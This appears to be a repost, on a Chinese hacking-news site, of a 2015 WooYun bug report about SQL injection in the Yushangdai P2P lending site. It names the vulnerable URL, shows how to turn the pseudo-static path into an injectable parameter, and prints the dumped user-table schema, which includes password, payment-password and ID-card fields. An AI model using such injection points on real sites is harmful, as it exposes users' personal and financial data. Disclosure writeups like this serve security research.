记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

豫商贷P2P金融平台SQL注入一枚可导致用户信息泄漏(伪静态重构突破)

2015-06-28 20:15

这是一个伪静态https://www.zzwms.com/news/info/id/5134.html

然后重新构造以下https://www.zzwms.com/news/info?id=5134或者直接加个*也行

内容相当多,用户名密码,wangwang,支付密码,由于只是测试,只是简单的看了下部分用户名(总用户10132)

漏洞证明:

11.PNG

12.PNG



Database: zzwms

Table: dw_user

[51 columns]

+-----------------+------------------+

| Column | Type |

+-----------------+------------------+

| order | int(11) |

| AccountNumber | varchar(10) |

| addip | varchar(50) |

| address | varchar(200) |

| addtime | varchar(50) |

| answer | varchar(100) |

| area | varchar(20) |

| Authorize | varchar(10) |

| avatar_status | int(2) |

| birthday | varchar(11) |

| card_id | varchar(50) |

| card_pic1 | varchar(150) |

| card_pic2 | varchar(150) |

| card_type | varchar(10) |

| city | varchar(20) |

| email | varchar(30) |

| email_status | varchar(50) |

| integral | varchar(10) |

| invite_money | varchar(10) |

| invite_userid | varchar(11) |

| islock | int(2) |

| lastip | varchar(20) |

| lasttime | varchar(50) |

| litpic | varchar(250) |

| Loanaddtime | varchar(50) |

| logintime | int(11) |

| MoneymoremoreId | varchar(10) |

| nation | varchar(10) |

| password | varchar(50) |

| paypassword | varchar(50) |

| phone | varchar(50) |

| phone_status | varchar(50) |

| privacy | text |

| province | varchar(20) |

| purview | varchar(100) |

| qq | varchar(50) |

| question | varchar(10) |

| real_status | varchar(2) |

| realname | varchar(20) |

| remind | text |

| scene_status | int(2) |

| sex | varchar(10) |

| status | int(2) |

| tel | varchar(50) |

| type_id | int(11) |

| upip | varchar(50) |

| uptime | varchar(50) |

| user_id | int(10) unsigned |

| username | varchar(30) |

| video_status | int(2) |

| wangwang | varchar(100) |

+-----------------+------------------+

12.PNG

13.PNG

修复方案:

安全很重要,欢迎来到乌云啊

知识来源: www.wooyun.org/bugs/wooyun-2015-0114051

阅读:82916 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“豫商贷P2P金融平台SQL注入一枚可导致用户信息泄漏(伪静态重构突破)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词